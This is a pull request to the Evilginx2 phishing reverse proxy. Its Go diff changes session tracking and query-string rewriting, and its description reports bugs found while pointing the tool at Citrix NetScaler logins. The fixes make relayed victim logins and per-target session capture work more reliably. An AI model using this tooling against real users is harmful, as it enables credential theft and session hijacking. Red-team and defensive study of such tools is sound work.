### PR TITLE
Fix issues in Evilginx2's session management and request handling

### DIFF
--- a/core/http_proxy.go
+++ b/core/http_proxy.go
@@ -248,6 +248,7 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 									p.extractParams(session, req.URL)
 
 									ps.Session = session
+									ps.Session.PhishLure = l
 									// tell method OnResponse to set Set-Cookie header
 									ps.Created = true
 

--- a/core/http_proxy.go
+++ b/core/http_proxy.go
@@ -387,16 +387,8 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 				req.Header.Set(string(hg), egg2)
 
 				// patch GET query params with original domains
-				if pl != nil {
-					qs := req.URL.Query()
-					if len(qs) > 0 {
-						for gp := range qs {
-							for i, v := range qs[gp] {
-								qs[gp][i] = string(p.patchUrls(pl, []byte(v), CONVERT_TO_ORIGINAL_URLS))
-							}
-						}
-						req.URL.RawQuery = qs.Encode()
-					}
+				if pl != nil && len(req.URL.RawQuery) > 0 {
+					req.URL.RawQuery = string(p.patchUrls(pl, []byte(req.URL.RawQuery), CONVERT_TO_ORIGINAL_URLS))
 				}
 
 				// check for creds in request body

--- a/core/session.go
+++ b/core/session.go
@@ -18,6 +18,8 @@ type Session struct {
 	IsForwarded   bool
 	RedirectCount int
 	PhishLure     *Lure
+	// maintains the internal database ID, which is sometimes reported in logging messages
+	Index         int
 }
 
 func NewSession(name string) (*Session, error) {
@@ -34,6 +36,7 @@ func NewSession(name string) (*Session, error) {
 		IsForwarded:   false,
 		RedirectCount: 0,
 		PhishLure:     nil,
+		Index:         0,
 	}
 	s.Tokens = make(map[string]map[string]*database.Token)
 

--- a/database/database.go
+++ b/database/database.go
@@ -29,13 +29,18 @@ func NewDatabase(path string) (*Database, error) {
 	return d, nil
 }
 
-func (d *Database) CreateSession(sid string, phishlet string, landing_url string, useragent string, remote_addr string) error {
-	_, err := d.sessionsCreate(sid, phishlet, landing_url, useragent, remote_addr)
-	return err
+func (d *Database) CreateSession(sid string, phishlet string, landing_url string, useragent string, remote_addr string) (int, error) {
+	id, err := d.sessionsCreate(sid, phishlet, landing_url, useragent, remote_addr)
+	return id, err
 }
 
 func (d *Database) ListSessions() ([]*Session, error) {
 	s, err := d.sessionsList()
+	return s, err
+}
+
+func (d *Database) GetSession(sid string) (*Session, error) {
+	s, err := d.sessionsGetBySid(sid)
 	return s, err
 }
 

--- a/database/db_session.go
+++ b/database/db_session.go
@@ -37,10 +37,10 @@ func (d *Database) sessionsInit() {
 	d.db.CreateIndex("sessions_sid", SessionTable+":*", buntdb.IndexJSON("session_id"))
 }
 
-func (d *Database) sessionsCreate(sid string, phishlet string, landing_url string, useragent string, remote_addr string) (*Session, error) {
+func (d *Database) sessionsCreate(sid string, phishlet string, landing_url string, useragent string, remote_addr string) (int, error) {
 	_, err := d.sessionsGetBySid(sid)
 	if err == nil {
-		return nil, fmt.Errorf("session already exists: %s", sid)
+		return -1, fmt.Errorf("session already exists: %s", sid)
 	}
 
 	id, _ := d.getNextId(SessionTable)
@@ -67,9 +67,9 @@ func (d *Database) sessionsCreate(sid string, phishlet string, landing_url strin
 		return nil
 	})
 	if err != nil {
-		return nil, err
+		return -1, err
 	}
-	return s, nil
+	return id, nil
 }
 
 func (d *Database) sessionsList() ([]*Session, error) {


### PR DESCRIPTION
Hey @kgretzky 

During the setup and testing of Evilginx2 for Citrix NetScaler, I recognised the following issues, which I resolved in this PR. I added comments in the source code, to provide you some insights why I made certain changes.

**Issue 1 - Issues in Evilginx2's session management**

If a user visits the targeted web site through Evilginx2, then Evilginx2 issues a session cookie (see the following screenshot) to keep track which HTTP requests belongs to which session.

![image](https://user-images.githubusercontent.com/39760194/97787815-b0d8e600-1bb4-11eb-9280-f58456e63410.png)

So far so good but, the current implementation contains the following issues:
- The issued session cookies are only managed in memory via a map and as a result, if Evilginx2 is restarted, all already issued session cookies are lost. In addition, no locks are applied on this session cookie map, which leads to race conditions.
- Issuing the command `sessions delete all` only deletes the session information in the database but not the session cookies managed in memory (see first point). This leads to inconsistencies between memory and the database.
- The current code does not perform the lookup of the session via the issued session cookie but via the source IP address. This represents an issue as only one person can be targeted per source IP address at a time. Subsequent targets from the same source IP address are ignored.

**Issue 2 - Evilginx2 incorrectly manipulates URLs**

Below you'll find two screenshots that document the issue.

![image](https://user-images.githubusercontent.com/39760194/97787922-55f3be80-1bb5-11eb-80b5-ff04f2f106e8.png)

![image](https://user-images.githubusercontent.com/39760194/97787944-850a3000-1bb5-11eb-8e19-5560d06248b2.png)

The left section of the first screenshot shows an excerpt of the HTTP request that the web browser sends to Evilginx2 after entering valid credentials. Afterwards, this HTTP request is forwarded by Evilginx2 to the actual target environment, which is documented in the left section of the second screenshot. 

Comparing the screenshots shows that Evilginx2 incorrectly adds a **=** at the end of the URL. Due to this incorrect manipulation logging into the application fails. Removing the **=** and sending the request again results in a successful login, which is documented in the following screenshot:

![image](https://user-images.githubusercontent.com/39760194/97788043-1c6f8300-1bb6-11eb-80de-d592579bb481.png)

If you have any questions, let me know.

Thanks and cheers
Chopicalqui